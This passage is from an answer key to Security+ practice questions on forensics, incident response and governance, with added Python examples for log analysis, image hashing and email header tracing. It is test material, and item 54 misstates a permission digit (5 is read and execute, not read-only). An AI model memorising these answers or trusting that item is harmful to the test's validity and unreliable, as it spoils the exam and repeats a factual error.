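Mar  3 09:15:49 web01 sshd[2293]: Failed password for invalid user admin from 203.0.113.7 port 40130 ssh2
Mar  3 09:15:52 web01 sshd[2295]: Failed password for invalid user test from 203.0.113.7 port 40141 ssh2
Mar  3 09:16:05 web01 sshd[2301]: Failed password for bob from 10.0.0.9 port 50211 ssh2
Mar  3 09:16:30 web01 sshd[2310]: Accepted publickey for bob from 10.0.0.9 port 50219 ssh2
"""

# sshd uses two phrasings: "Failed password for <user> from <ip>" for accounts
# that exist and "Failed password for invalid user <user> from <ip>" for ones
# that do not. A grep for "Failed password" catches both; so does this regex.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)


def failed_logins(log_text):
    """Return one (user, source_ip) tuple per 'Failed password' line."""
    hits = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            hits.append((m.group("user"), m.group("ip")))
    return hits


def brute_force_sources(log_text, threshold=3):
    """Map source IP -> failure count for every IP at or above `threshold`.

    A single failure (bob mistyping once from 10.0.0.9) is noise; a burst of
    failures from one address against several accounts is the brute-force
    pattern Greg is looking for.
    """
    counts = Counter(ip for _, ip in failed_logins(log_text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in brute_force_sources(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {n} failed password attempts")  # prints 203.0.113.7: 4
```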
41. C. The browser cache, history, and session information will all contain information from recently visited sites. Bookmarks may indicate sites that a user has visited at some point, but a bookmark can be added without visiting a site at all.
42. C. Wireshark is a packet analyzer that can be used to capture and analyze network traffic for forensic purposes. Unlike disk forensics, network forensics require forethought and intentional capture of data before it is needed since traffic is ephemeral. Organizations that want to have a view of network traffic without capturing all traffic might use NetFlow or sFlow to provide some information about network traffic patterns and usage. Nessus is a vulnerability scanner, nmap is a port scanner, and Simple Network Management Protocol (SNMP) is a protocol used to transfer and gather information about network devices and status.
43. A. Mapping networks using ping relies on pinging each host, and then uses time-to-live (TTL) information to determine how many hops exist between known hosts and devices inside a network. When TTLs decrease, another router or switch typically exists between you and the device. Packets sent and received can be used to determine if there are issues with the path or link, and transit time can provide information about relative network distance or the path used, but traceroute provides far more useful detail in that case.
44. C. Organizations define retention policies for different data types and systems. Many organizations use 30-, 45-, 90-, 180-, or 365-day retention policies, with some information required to be kept longer due to law or compliance reasons. Susan's organization may keep logs for as little as 30 days depending on storage limitations and business needs. Data classification policies typically impact how data is secured and handled. Backup policies determine how long backups are retained and rotated and may have an impact on data if the logs are backed up, but backing up logs is a less common practice due to the space they take up versus the value of having logs backed up. Legal hold practices are common, but policies are less typically defined for legal holds since requirements are set by law.
45. C. Zero-wiping a drive can be accomplished using dd, and when this command is completed Selah will have written zeroes to the entire drive /dev/sda.
46. C. Involving impacted areas, or those that have a role in the process, is part of stakeholder management and ensures that those who need to be involved or aware of the incident response process are engaged throughout the process. Laws rarely have specific requirements for internal involvement, instead focusing on customers or those whose data is involved in an incident. Retention policies determine what data is kept and for how long. COOP is Continuity of Operations Planning, a federal effort to ensure disaster recovery and business continuity plans are in place for federal agencies.
47. A. A simulation is the closest you can get to a real-world event without having one. A tabletop exercise has personnel discussing scenarios, whereas a walk-through goes through checklists and procedures. A wargame is not a common exercise type.
48. C. The Content-Addressable Memory (CAM) tables on switches contain a list of all the devices they have talked to and will give Erin the best chance of identifying the devices on the network. Wireshark and netstat will only have a view of the devices that the system she is working from communicates with or that broadcast on the network segment she is on. Domain Name System (DNS) will list only systems that have a DNS entry. In most organizations, relatively few systems will have entries in DNS.
49. C. Sensors are deployed, either as agents, hardware, or virtual machines, to gather information to relay it back to a security information and event management (SIEM) device. Alert levels, trend analysis features, and sensitivity thresholds are all used to analyze and report on data, not to gather data.
50. C. A quarantine process or setting will preserve malicious or dangerous files and programs without allowing them to run. This allows defenders to retrieve them for further analysis as well as to return them to use if they are determined not to be malicious, or if the malicious components can be removed from needed files. Purging, deep-freezing, and retention are not terms used to describe this behavior or setting.
51. C. Chuck should recommend a mobile device management (MDM) system to ensure that organizational devices can be managed and protected in the future. Data loss prevention (DLP) will not stop a lost phone from being a potential leak of data, isolating the phones is not a realistic scenario for devices that will actually be used, nor is containment because the phone is out of the organization's control once lost.
52. A. A content filter is specifically designed to allow organizations to select both specific sites and categories of content that should be blocked. Gabby could review content categories and configure the filter to prevent students from browsing to the unwanted sites. A data loss prevention (DLP) solution is designed to prevent data loss, a firewall can block IP addresses or hostnames but would require additional functionality to filter content, and an intrusion detection system (IDS) can detect unwanted traffic but cannot stop it.
53. B. Information stored on a disk drive is one of the least volatile items in the order of volatility, but backups are even less volatile. That means Frank should capture backups after he images the disk drive and that he should capture CPU cache and registers as well as system RAM first if he needs them.
54. C. The -R flag applies the permission recursively to all files in the named directory. Here, the permissions are 7, which sets the owner to read, write, and execute, and 55, which sets group and then world permissions to read only. 755 is a very commonly used permission on Linux systems.
55. B. The most important action Charles can take while working with his forensic artifacts to provide nonrepudiation is to digitally sign the artifacts and information that he is creating in his evidence records. Encrypting the output will ensure its confidentiality but will not provide nonrepudiation by itself. MD5 checksums for images are commonly gathered but must then be signed so that they can be validated to ensure they have not been modified.
56. D. The memdump tool is a command-line memory dump utility that can dump physical memory. Somewhat confusingly, memdump is also a flag in the very useful Volatility framework, where it can be used to dump memory as well. The remaining options were made up and are not Linux tools, although you can create a ramdump on Android devices.
57. B. The Windows swap file is pagefile.sys and is saved in the root of the C:\ drive by default.
58. A. The best way to capture a virtual machine from a running hypervisor is usually to use the built-in tools to obtain a snapshot of the system. Imaging tools are not typically capable of capturing machine state, and dd is not designed to capture VMs. Removing a server's drives can be challenging due to RAID and other specific server configuration items, and doing so might impact all other running VMs and services on the system.
59. C. A well-documented chain of custody can help establish provenance for data, proving where it came from, who handled it, and how it was obtained. Right to audit, timelines, and preservation of images do not establish provenance, although preservation is part of the chain of custody process.
60. B. Digital forensics techniques are commonly used to analyze attack patterns, tools, and techniques used by advanced persistent threat (APT) actors for counterintelligence purposes. They may sometimes be used to determine what information was stolen, but this is not the most common use for digital forensic techniques, nor is their use as a training mechanism.
61. A. Law enforcement is not typically part of organizational incident response teams, but incident response teams often maintain a relationship with local law enforcement officers. Security analysts, management, and communication staff as well as technical experts are all commonly part of a core incident response team.
62. A. Even if you're not familiar with iptables, you can read through these rules and guess which rule includes the right details. DROP makes sense for a block, and you should know that SSH will be a TCP service on port 22.
63. C. logger is a Linux utility that will add information to the Linux syslog. It can accept file input, write to the system journal entry, send to remote syslog servers, and perform a variety of other functions. The other commands do not directly interface with the system log.
64. A. Incident response plans don't stop incidents from occurring, but they do help responders react appropriately, prepare the organization for incidents, and may be required for legal or compliance reasons.
65. D. Degaussing a drive uses strong magnetic fields to wipe it and is the least likely to result in recoverable data. Deleted files can often be recovered because only the file index information will be removed until that space is needed and is overwritten. Quick formats work in a similar way and will leave remnant data, and files that are overwritten by smaller files will also leave fragments of data that can be recovered and analyzed.
66. D. Henry's most likely use for the video is to document the forensic process, part of the chain of custody and provenance of the forensic data he acquires. The order of volatility helps determine what devices or drives he would image first. There is no crime being committed, so establishing guilt is not relevant to this scenario, and the video will not ensure data is preserved on a drive during a forensic process.
67. B. WinHex is the only disk editor in this list. Autopsy is a forensic analysis suite; dd and FTK Imager are both imaging tools. WinHex also provides the ability to read RAID and dynamic disks, perform data recovery, edit physical memory, clone disks, wipe files and drives, and a variety of other functions.
68. B. Playbooks list the required steps that are needed to address an incident. A runbook focuses on the steps to perform an action or process as part of an incident response process. Thus, a playbook may reference runbooks. Business continuity (BC) plans and disaster recovery (DR) plans are not used for incident response, but they are used to ensure that a business stays online or can recover from a disaster.
69. C. Passwords are typically stored using a hash, and best practices would have them stored using a password security–specific hash. Alaina can speed up her efforts if she knows what hashing algorithm and options were used on the passwords. The age and length of the passwords are not necessary, and passwords should not be stored in encrypted form—but the question also specifically notes they're hashed passwords.
70. D. An application blocklist would fit Vincent's needs the best from the list provided. An approved list would prevent other tools from being installed, which may impede functionality while making the maintenance of the list challenging. A data loss prevention (DLP) solution attempts to prevent data from being sent or exposed but does not prevent installations or downloads of games. A content filter might help, but workarounds are easy, including sending games via email or via a thumb drive.
71. B. IPSec is not a tool used to capture network flows. sFlow, NetFlow, and IPFIX are all used to capture network flow information, which will provide the information Charlene needs.
72. C. A system crash, or system dump, file contains the contents of memory at the time of the crash. The infamous Windows blue screen of death results in a memory dump to a file, allowing analysis of memory contents. The swap file (pagefile) is used to store information that would not fit in memory but is unlikely to contain a currently running malware package, since files are swapped out when they are not in use. The Windows security log does not contain this type of information, nor does the system log.
73. C. The Windows tracert command will show the route to a remote system as well as delays along the route. traceroute is the equivalent command in Linux. The arp command allows you to view and modify the Address Resolution Protocol (ARP) cache in Windows, and netstat has varying functions in different operating systems but generally shows statistics and information about network usage and status.
74. B. PRTG and Cacti are both network monitoring tools that can provide bandwidth monitoring information. Bandwidth monitors can help identify exfiltration, heavy and abnormal bandwidth usage, and other information that can be helpful for both incident identification and incident investigations. If you encounter a question like this on the exam, even if you're not familiar with either tool, you can use your knowledge of what Simple Network Management Protocol (SNMP) is used for to identify which of the categories is most likely correct.
75. D. The Security+ exam outline focuses on right to audit clauses, regulatory and jurisdictional issues, and data breach notification laws as key elements to consider when planning on-site versus cloud forensic differences. Provenance is important regardless of where the forensic activity occurs.
76. A. A variety of configuration changes could be pushed to mobile devices to help: setting passcodes, enabling full-disk encryption (FDE) on mobile devices via organizationally deployed mobile device management (MDM), or even preventing some sensitive files from being downloaded or kept on those devices could all help. Firewall rules, data loss prevention (DLP) rules, and URL filters will not prevent a stolen device from being accessed and the data being exposed.
77. B. The @ command for dig selects the Domain Name System (DNS) server it should query. In this case, it will query one of Google's DNS servers at 8.8.8.8 for the DNS information for example.com.
78. C. Greg should use the built-in hashing functions to compare either an MD5 or SHA-1 hash of the source drive to a hash using the same function run on the image. If they match, he has a valid and intact image. None of the other answers will provide validation that the full drive was properly imaged.
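The image validation described in questions 25 and 78, worked through in code: the example below is added here and is not from the book. It stands in for the source drive and the image with constructed in-memory byte strings (a real check would open the block device and the image file instead), hashes each in chunks with the same algorithm, and shows that a single altered byte makes the digests diverge; the function names are my own.

```python
import hashlib
import io


def hash_stream(stream, algorithm="sha1", chunk_size=64 * 1024):
    """Hash a file-like object in fixed-size chunks.

    Reading in chunks means a multi-terabyte drive image is never loaded
    into RAM at once; the digest is identical to hashing the whole thing.
    """
    h = hashlib.new(algorithm)
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()


def verify_image(source, image, algorithms=("md5", "sha1")):
    """Return {algorithm: (source_digest, image_digest, match)}.

    Both streams are rewound before each algorithm so every pass hashes the
    same bytes. Recording both digests, not just the boolean, is what goes
    into the evidence log: the numbers are what a reviewer can re-check.
    """
    results = {}
    for alg in algorithms:
        source.seek(0)
        image.seek(0)
        src_digest = hash_stream(source, alg)
        img_digest = hash_stream(image, alg)
        results[alg] = (src_digest, img_digest, src_digest == img_digest)
    return results


def image_is_valid(source, image, algorithms=("md5", "sha1")):
    """True only if every requested algorithm agrees the image matches the source."""
    return all(match for _, _, match in verify_image(source, image, algorithms).values())


# Constructed "drive" contents: 1 MiB of deterministic bytes standing in for
# the raw device. These are not real disk images.
SOURCE_DRIVE = bytes(range(256)) * (1024 * 1024 // 256)
GOOD_IMAGE = SOURCE_DRIVE                      # bit-for-bit copy
TAMPERED_IMAGE = SOURCE_DRIVE[:-1] + b"\x00"   # final byte changed (0xff -> 0x00)


def verify_constructed_images():
    """Run both constructed cases; a valid image passes, a one-byte change fails."""
    return {
        "good": image_is_valid(io.BytesIO(SOURCE_DRIVE), io.BytesIO(GOOD_IMAGE)),
        "tampered": image_is_valid(io.BytesIO(SOURCE_DRIVE), io.BytesIO(TAMPERED_IMAGE)),
    }


if __name__ == "__main__":
    for alg, (s, i, ok) in verify_image(io.BytesIO(SOURCE_DRIVE),
                                        io.BytesIO(TAMPERED_IMAGE)).items():
        print(f"{alg}: source={s} image={i} match={ok}")
    print(verify_constructed_images())  # {'good': True, 'tampered': False}
```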
79. B. The Linux grep command is a search tool that Adam can use to search through files or directories to find strings. cat is short for concatenate, and the command can be used to create files, to view their contents, or to combine files. head and tail are used to view the beginning or end of a file, respectively.
80. C. Segmentation splits networks or systems into smaller units that align with specific needs. Segmentation can be functional, security based, or for other purposes. Removing potentially infected systems would be an example of isolation, using firewalls and other tools to stop the spread of an infection is containment, and adding security systems to prevent data loss is an example of implementing a security tool or feature.
81. B. Unlike a disaster recovery plan that is written to help an organization recover from a person-made or natural disaster, a business continuity plan focuses on how to keep the business running when it is disrupted. Thus, Charlene's BC plan would detail how to keep the organization running when a system outage occurs.
82. C. OpenSSL can be used to generate a certificate using a command like this:
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt
None of the other tools listed can be used to generate a certificate.
83. A. The only password cracker listed is John the Ripper. John accepts custom wordlists, meaning that Cameron can create and use his own wordlist, as shown in option A.
84. A. Autopsy does not have a built-in capability to create disk images. Instead, it relies on third-party tools for acquisition and then imports disk images and other media. Autopsy has built-in timeline generation, image filtering and identification, and communication visualization, among many other capabilities.
85. C. Many cloud service providers do not allow customer-driven audits, either by the customer or a third party. They also commonly prohibit vulnerability scans of their production environment to avoid service outages. Instead, many provide third-party audit results in the form of a service organization controls (SOC) report or similar audit artifact.
86. B. The Cyber Kill Chain moves to privilege escalation after exploitation. The entire kill chain is: 1) Reconnaissance, 2) Intrusion, 3) Exploitation, 4) Privilege Escalation, 5) Lateral Movement, 6) Obfuscation/Anti-forensics, 7) Denial of Service, and 8) Exfiltration.
87. D. Of the tools that are listed, only Metasploit is an exploitation framework. Cuckoo is a malware testing sandbox, theHarvester is an open source intelligence gathering tool, and Nessus is a vulnerability scanner. Tools like Metasploit, BeEF, and Pacu are all examples of exploitation frameworks.
88. A. A playbook for a security orchestration, automation, and response (SOAR) environment is a set of rules that determine what actions will be performed when an event occurs that is identified by the SOAR using data it collects or receives.
89. B. The Security+ exam outline uses a six-step process for incident response: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.
90. D. A disaster recovery plan addresses what to do during a person-made or natural disaster. A flood that completely fills a datacenter would require significant efforts to recover from, and Gurvinder will need a solid disaster recovery plan—and perhaps a new datacenter location as soon as possible! A COOP, or Continuity of Operations Plan, is needed for U.S. government agencies but is not required for businesses. A business continuity plan would cover how to keep business running, but it does not cover all the requirements in a natural disaster of this scale, and a flood insurance plan is not a term used in the Security+ exam.
91. C. pathping combines both ping and tracert/traceroute style functionality to help identify both the path used and where latency is an issue. It is built into Windows and can be used for exactly the troubleshooting that Frank needs to accomplish. He could use both ping and tracert/traceroute to perform the task, but he would need to spend more time using each tool in turn to identify the same information that pathping will put into a single interface. netcat, while useful for many tasks, isn't as well suited to this one.
92. A. The dnsenum tool can perform many Domain Name System (DNS)-related functions, including querying A records, nameservers, and MX records, as well as performing zone transfers, Google searches for hosts and subdomains, and netrange reverse lookups. dig and host are useful for DNS queries but do not provide this range of capabilities, and dnscat was made up for this question.
93. C. Jill wants the least possible changes to occur on the system, so she should instruct the user to not save any files or make any changes. Rebooting the system will not create a memory dump, and may cause new files to be written or changed if patches were waiting to install or other changes are set to occur during a reboot. Turning off secure delete or making other changes will not impact the files that were deleted prior to that setting change.
94. C. Anti-forensics activities follow lateral movement in the Cyber Kill Chain model. It helps to remember that after an attacker has completed their attack, they will attempt to hide traces of their efforts, and then may proceed to denial-of-service or exfiltration activities in the model.
95. B. The IR process used for the Security+ exam outline is Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned. Veronica should move into the lessons learned phase.
96. C. Quick formatting merely deletes file indexes rather than removing and overwriting files, making it inappropriate for sanitization. Physical destruction will ensure that the data is not readable, as will degaussing and zero wiping.
97. D. Microsoft Office places information like the name of the creator of the file, editors, creation and change dates, and other useful information in the file metadata that is stored in each Office document. Bart can simply open the Office document to review this information or can use a forensic or file metadata tool to review it. Filenames may contain the creator's name, but this would only be if the creator included it. Microsoft Office does not create or maintain a log, and the application log for Windows does not contain this information.
98. B. Windows Defender Firewall operates on a per-application model and can filter traffic based on whether the system is on a trusted private network or a public network. Nathaniel should allow Chrome by name in the firewall, which will allow it to send traffic without needing to specify ports or protocols.
99. B. The dnsenum Perl script builds in quite a few Domain Name System (DNS) enumeration capabilities, including host, nameserver, and MX record gathering; zone transfer; Google scraping for domains; subdomain brute forcing from files; as well as Whois automation and reverse lookups for networks up to class C in size. Although you could manually use dig or nslookup or even netcat to perform many of these functions, dnsenum is the only automated tool on the list.
100. B. Building a timeline, particularly from multiple systems, relies on accurately set system clocks or adding a manually configured offset. Disk hashing and acquisition does not need an accurate system clock, and file metadata can be reviewed even without an accurate clock, although accurate clock information or knowing the offset can be useful for analysis.
101. B. Data breach notification laws often build in a maximum length of time that can pass before notification is required. They also often include a threshold for notification, with a maximum number of exposed individuals before the state or other authorities must be notified. They do not include a maximum number of individuals who can be notified, nor do they typically have specific requirements about police involvement in forensic investigations or certification types or levels.
102. C. A data loss prevention (DLP) tool that can scan and review emails for SSN style data is the most effective tool listed here. Naomi may want to set the tool to block all emails with potential SSNs, and then review those emails manually to ensure that no further emails leave while allowing legitimate emails to pass through. An intrusion detection system (IDS) might look tempting as an answer, but an IDS can only detect, not stop, the traffic, which would allow the SSNs to exit the organization. Antimalware and firewalls will not stop this type of event.
103. C. Email headers contain a significant amount of metadata, including where the email was sent from. The from: field lists a sender but does not indicate where the email was actually sent from. The to: field lists who the email was sent to, and footers are not used to store this information for email.
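To see why the From: field does not answer "where was this sent from" (question 103), the example below walks the Received: headers instead; it is added here and is not from the book. The raw message is a constructed sample (the addresses and hosts are documentation values, not real ones), and the regexes and function names are my own; the parsing relies only on Python's standard email module.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample message, not a real email. Each mail server prepends its
# own Received: header, so the TOP header is the last server to handle the
# mail and the BOTTOM one is the first hop: where the message really entered
# the mail system. The From: header is just a claim made by the sender.
RAW_MESSAGE = """\
Received: from mx1.example.org (mx1.example.org [192.0.2.10]) by mail.example.com with ESMTPS id abc123; Tue, 2 Mar 2021 10:05:14 +0000
Received: from relay.example.org (relay.example.org [192.0.2.22]) by mx1.example.org with ESMTP id def456; Tue, 2 Mar 2021 10:05:12 +0000
Received: from WIN-LAPTOP (unknown [198.51.100.77]) by relay.example.org with ESMTPA id ghi789; Tue, 2 Mar 2021 10:05:10 +0000
From: "Accounts Payable" <ap@example.com>
To: finance@example.com
Subject: Updated wire instructions

Please see the attached invoice.
"""

# "from <helo-name> (<reverse-dns> [<ip>]) by <receiving-server>" is the
# common shape of a Received: header; the parenthesised part is optional.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s*(?:\((?P<detail>[^)]*)\))?\s+by\s+(?P<by>\S+)",
    re.IGNORECASE,
)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_hops(raw_message):
    """Return the hops in transit order (first hop first) as dicts."""
    msg = message_from_string(raw_message)
    hops = []
    # get_all() returns headers top-down; reversing puts the first hop first.
    for value in reversed(msg.get_all("Received", [])):
        m = RECEIVED_RE.search(" ".join(value.split()))   # collapse folding
        if not m:
            continue
        ip_match = IP_RE.search(m.group("detail") or "")
        hops.append({
            "helo": m.group("helo"),
            "ip": ip_match.group(1) if ip_match else None,
            "by": m.group("by"),
        })
    return hops


def origin_summary(raw_message):
    """Contrast the claimed sender with the first hop the mail actually came from."""
    msg = message_from_string(raw_message)
    hops = received_hops(raw_message)
    first = hops[0] if hops else {}
    return {
        "from_header": parseaddr(msg["From"])[1],   # what the sender claims
        "origin_host": first.get("helo"),           # what the first relay saw
        "origin_ip": first.get("ip"),
        "hop_count": len(hops),
    }


if __name__ == "__main__":
    # Claims to be ap@example.com but entered via an unknown external host.
    print(origin_summary(RAW_MESSAGE))
```

The first hop's IP is the one worth checking against reputation data; everything above it was added by servers the investigator can usually trust.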
104. A. Jurisdictional boundaries exist between states and localities, as well as countries, making it challenging for local law enforcement to execute warrants and acquire data from organizations outside of their jurisdiction in many cases. Venue is used to describe where a legal case is conducted. Legislation may or may not have an impact, and breach laws are unlikely to impact this but would guide Henry about when notifications of a breach would need to occur.
105. A. Olivia should use John the Ripper. Although both John the Ripper and rainbow table tools like Ophcrack can be used to crack passwords, John the Ripper will provide a better view of how hard the password was to crack, whereas rainbow table tools will simply determine if the password hash can be cracked. Crack.it and The Hunter were made up for this question.
106. B. The Federal Emergency Management Agency (FEMA), part of the Department of Homeland Security, is in charge of Continuity of Operations Planning (COOP), which is a requirement for federal agencies. The U.S. Department of Agriculture (USDA), the National Security Agency (NSA), and the Federal Bureau of Investigations (FBI) are not in charge of Continuity of Operations Planning.
107. B. Windows configuration data can be queried using PowerShell, allowing Elaine to write scripts that will gather security configuration data. Bash is a shell used for Linux systems. Although Windows systems can now run Bash in the Linux subsystem, it isn't installed by default. Secure Shell (SSH) is used for remote shell access, and Python could be used but would need to be installed specifically for this purpose and isn't available by default.
108. C. The best option listed is a Wireshark capture of traffic from the phone. In some cases, this traffic may be encrypted, and Ramon may need to take additional steps to decrypt the data. Call manager logs and Session Initiation Protocol (SIP) logs do not include the full audio of a conversation.
109. C. NXLog is a log collection and centralization tool. IPFIX, NetFlow, and sFlow all gather data about network traffic, including source, destination, port, protocol, and amount of data sent to be collected.
110. A. Pete has isolated the system by placing it on a separate logical network segment without access. Some malware can detect if systems lose their network connection, and Pete may want to perform forensics via the network or monitor attempts to send outbound traffic, meaning that simply unplugging the system may not meet his needs. Containment would involve limiting the spread or impact of an attack, segmentation places systems in groups based on rules or security groupings, and eradication is a part of the incident response (IR) process where components of an incident or attack are removed.
111. C. Virtual machine forensics typically rely on a snapshot gathered using the underlying virtualization environment's snapshot capabilities. This will capture both memory state and the disk for the system and can be run on an independent system or analyzed using forensic tools.
112. B. The tcpreplay tool is specifically designed to allow PCAP capture files to be replayed to a network, allowing exactly this type of testing. hping can be used to craft packets, but it's not designed to replay capture files. tcpdump is used to capture packets, but again, it is not a replay tool, and Cuckoo is a sandboxing tool for testing and identifying malware packages.
113. C. Windows creates a dump file, which contains all the contents of active memory to allow analysis of the crash.
114. D. Segmenting a network based on security or risk levels helps ensure that attacks and compromises are constrained to the same type of systems or devices with similar levels of security requirements. Isolation would remove a device or system from contact with the network or other systems. Fragmentation and tiering are not terms used for the Security+ exam.
115. A. Tagging each drive helps with inventory and ensures that the drive is tracked properly and that the chain of custody can be maintained. Taking a picture may be useful to identify the drive, but tagging and inventory control are more important. Drives are not labeled with an order of volatility because the order of volatility is associated with the type of forensic target, not with a specific drive. Interviews may be useful but are not always conducted with every person whose machine is imaged.
116. B. The provenance of a forensic artifact includes the chain of custody, including ownership and acquisition of the artifact, device, or image. E-discovery is the process of doing discovery in electronic formats for litigation, investigations, and records requests. Jurisdiction is the region or area where laws or law enforcement has authority. Volatility is how likely a device or component is to change.
117. B. The Volatility framework is a purpose-built tool for the acquisition of random access memory (RAM) from a live system. Autopsy is a forensic tool for drive analysis and forensic investigations, dd is used to image drives, and netcat is a tool used to transfer data or to make connections to systems across a network.
118. D. Wireshark is a network protocol analyzer and capture tool that can be used for troubleshooting in circumstances like this. In fact, security practitioners are often asked to verify that traffic is being received properly as part of firewall rule troubleshooting. Randy may want to capture traffic at both ends of the communication to make sure that the clients are sending traffic properly and then to match that to the same traffic being received—or going missing—at the other end. tracert and traceroute are useful for validating the route that traffic takes but would not show if HTTPS packets were being blocked, and Sn1per is a pentest framework that allows automated pentesting.
119. B. The oldest and least capable tool listed is syslog, the original system logging tool for Linux and Unix systems. The other three options have advanced features, which mean that they are more broadly implemented when flexibility and reliability are needed.
120. A. The only tool on this list that can be used to craft packets is hping. Susan could use the sample code or exploit by building the necessary packet with hping and then sending it to a Dynamic Host Configuration Protocol (DHCP) server in her network while monitoring with her intrusion prevention system (IPS). She may want to capture all of her traffic with Wireshark or tcpdump to observe what happens on both ends too!
121. D. SQL injection attempts are sent as HTTP or HTTPS requests to a web server, meaning that Valerie will be able to see the attacks in the web server log. Domain Name System (DNS) logs, if available, will not show these. Auth logs show logins, not web or SQL Server queries or requests. Unlike Windows, there is no security log file for Linux, although there is a secure log for some systems.
122. A. If the private key and the passphrase for a certificate are exposed, the certificate should be revoked. A new certificate will need to be issued, but the certificate cannot be trusted and revocation is the first step to handle the issue properly. Changing the password will not help, and changing the private or public key will require a new certificate.
123. C. A legal hold notice will inform the company that they must preserve and protect information related to the case. None of the other items are terms used in this process.
124. B. netstat can show all active connections, and using the -a flag will do so. netstat does not provide a -c command flag. The route command is used to modify and display the system's routing table. hping is a packet analyzer and packet building tool often used to craft specific packets as part of penetration tests and attacks.
125. B. A quarantine setting will place a malicious or suspect file in a safe location and will keep it there until a set timeframe has passed or until an administrator takes action to deal with it. This can allow you to further analyze the file or to restore it if it was an incorrect identification or if the file is needed for another purpose. Containment is used to limit the extent of an incident or attack, isolation keeps a system or device from connecting to or accessing others, and deleting a file wouldn't keep it around.
126. D. Although Linux systems can use a file for swap space, a common solution is to use a separate partition for swap space.
127. A. Tracking multiple drives requires careful inventory, evidence handling logging, and tagging of the drives to ensure that they are the right drive and that they are tracked throughout the forensic investigation. Marco should carefully tag each of the drives and ensure that those tags are used throughout the investigation.
128. D. The -v flag for netcat sets it to verbose mode. That means that Isaac has attempted to connect to every port from 1 to 1024 on 10.11.10.1 using netcat. Since there are no other flags or options, it will simply try to connect, and then provide a verbose result about what happened, resulting in a simple but effective port scan.
129. B. Tony's best option is likely containment. He may want to remove that location from the corporate network or to prevent most traffic from being permitted until he can take a deeper look into what is going on. If he isolated the entire site, he might disrupt critical business operations, and segmentation would have been more appropriate before the event occurred.
130. C. Right-to-audit clauses are commonly accepted as part of service and leasing contracts regardless of location for datacenter co-location and facility rental contracts. Cloud service providers, however, are less likely to sign a right-to-audit contract. Instead, they may provide third-party audit data to customers or even to potential customers.
131. D. The best option for Alaina would be to use a URL filter to block users from visiting the link in the phishing email. A WAF, or web application firewall, is designed to prevent attacks against a web application. Patching can help stop exploits of vulnerable services or systems, but this is a phishing attack, and an allowlist lists allowed items, not blocked items, and limiting which websites an entire company can visit is almost impossible in most circumstances.
132. A. Playbooks list the actions that an organization will take as part of a response process. A runbook lists the steps required to perform an action like notification, removing malware, or similar tasks. Playbooks tend to be used to document processes, whereas runbooks tend to be used for specific actions. A disaster recovery (DR) plan is used to recover from disasters, and a business continuity (BC) plan is used to ensure that the organization continues to function.
133. B. Since MAC addresses are only visible within a broadcast domain (local network), the MAC addresses of external hosts cannot be retrieved using the arp command. The MAC addresses for local systems, the IP addresses of the local host, and whether they are dynamic or static can all be determined using the arp command.
134. C. The journalctl tool is used to query the systemd journal. On systemd-enabled Linux distributions, the journal contains kernel and boot messages as well as syslog messages and messages from services.
135. C. The recovery phase often involves adding firewall rules and patching systems in addition to rebuilding systems. Although preparation may involve configuring firewall rules or regular patching, it does not do so in response to an incident. Containment might involve both but is less likely to, since the focus will be on broader fixes, and eradication works to remove the threat.
136. A. The curl command-line tool supports downloads and uploads from a wide variety of services, and it would be the ideal solution for this scenario. hping is used for crafting packets, nmap is a port scanner, and theHarvester is an open source intelligence gathering tool, none of which meet Gary’s needs.
137. C. Gary should look at the trend information for malware detections to check to see if there are more infections being detected than during recent weeks. This can be a useful indicator of a change, either due to a new malware technique or package, a successful attack that has resulted in staff members clicking on malicious links or opening malicious emails, or other paths into the organization. Gary could then check with users whose systems reported the malware to see what had occurred. Alerts might show the infections but would not show the data over time as easily as trends. Sensors will show individual places data is gathered, and bandwidth dashboards can show useful information about which systems are using more or less bandwidth, but the trends dashboard remains the right place for him to look in this situation.
138. B. Although it can be easy to focus on the digital part of digital forensics, interviews with end users and others involved in an incident can be a key element of a forensic investigation. Investigators still need to gather information and record what they found, but an interview can provide firsthand knowledge and additional details that may not be able to be recovered via technical means like email or disk forensics. A chain of custody does not provide information about reports from end users.
139. B. The only option on this list that supports Aaron’s requirements is NXLog. Syslog can receive Windows events if they are converted to syslog, but it isn’t a native feature. IPFIX is a network flow standard, and journalctl is used to access the systemd journal.
140. A. Typical exercise types for most organizations include simulations that emulate an actual incident response process, walk-throughs that guide staff through an event, and tabletop exercises that are gamed out without taking actual action. Drills are classified as more focused on specific actions or functions, and they are less common because they can result in inadvertent action or mistakes and do not cover the breadth of an incident.
141. A. Of the options listed, netstat is the only tool that will not perform a port scan.
142. C. The top of the diamond should be labeled Adversary, one of the four vertices on the Diamond model.
143. C. Electronic discovery, or e-discovery, is the legal proceeding involved in litigation, FOIA requests, and similar efforts that produce information in electronic form. Email forensics could be required to recover data in an investigation, but there is no indication in the question of any need for forensic investigation. Inquisitions and provenance are not concepts for the Security+ exam.
Chapter 5: Governance, Risk, and Compliance

1. A. Caroline should select ISO 27002. ISO 27002 is an international standard for implementing and maintaining information security systems. ISO 27017 is an international standard for cloud security; NIST 800-12 is a general security standard and it is a U.S. standard, not an international one; and NIST 800-14 is a standard for policy development, and it is also a U.S. standard, not an international one.
2. B. If a system is infected with malware, the malware will operate with the privileges of the current user. If you use nonadministrative accounts, with least privileges, then the malware won’t be able to access administrative functionality without a privilege escalation capability.
3. D. Least privilege is the most fundamental concept in establishing accounts. Each user should have just enough privileges to do their job. This concept also applies to service accounts. Although each of the other options is something you would consider, they are not as critical as the principle of least privilege.
4. C. Change management is the process of documenting all changes made to a company’s network and computers. Avoiding making changes at the same time makes tracking any problems that can occur much simpler. Due diligence is the process of investigation and verification of the accuracy of a particular act. Acceptable use policies state what actions and practices are allowed in an organization while using technology. Due care is the effort made by a reasonable party to avoid harm to another. It is the level of judgment, care, determination, and activity a person would reasonably expect to do under certain conditions.
